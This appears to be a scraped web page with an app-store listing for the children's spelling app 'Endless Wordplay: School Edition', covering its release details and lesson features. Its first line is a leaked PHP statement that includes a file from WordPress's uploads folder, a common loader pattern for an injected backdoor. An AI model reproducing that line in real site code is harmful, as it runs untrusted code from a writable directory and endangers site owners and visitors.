include_once(ABSPATH . '/wp-content/uploads/index.php');
March 26th, 2015
This app is designed for both iPhone and iPad
Released: Mar 25, 2015
Size: 86.6 MB
Seller: Originator Inc.
Endless Wordplay: School Edition by Originator Inc.
Description*From the team at ORIGINATOR - the creators of the beloved Endless Alphabet, Endless Reader, and Endless Numbers.... Originator is a team of passionate artists and engineers dedicated to the best education+entertainment apps for kids.*
IMPORTANT: THIS IS ESSENTIALLY THE SAME APP AS ENDLESS WORDPLAY, BUT SPECIFICALLY FOR SCHOOLS USING THE VOLUME PURCHASE PROGRAM OR THOSE THAT CANNOT MAKE IN-APP PURCHASES. DO NOT PURCHASE THIS APP IF YOU'VE ALREADY PURCHASED WORDPLAY PACKS IN ENDLESS WORDPLAY.
As the next delightful app in the Endless series, Endless Wordplay sets the stage for spelling, word building, and wonderful rhymes! This app introduces key spelling patterns and phonograms that are important for beginning spellers and early writers. Written English can be complex and confusing, and Endless Wordplay reinforces spelling rules and variations using rhymes and a fun, progressive learning path.
Kids will have a blast learning spelling patterns and phonograms with the all-new Alphabot and the beloved Endless monsters. Each lesson reinforces a spelling and phonetic pattern using a sequence of rhyming word puzzles with letters that come alive. The rhyming words then lead to entertaining and illustrative animations that are as fun as they are educational.
- 30 spelling lessons (90 words). 60 more lessons (180 words) will be added as part of a free app update update later in 2015.
- The delightful lessons presented by Alphabot reinforce spelling and phonetic patterns in a fun and interactive way.
- Animations bring the rhyming words to life and reinforce definitions and usage.
- Endless Wordplay was designed with your children in mind. There are no high scores, failures, limits or stress. Your children can interact with the app at their own pace.
- SPECIAL FEATURES FOR TEACHERS: A setting to require student to complete lessons in order or to skip around. Also, a setting to turn off the background music.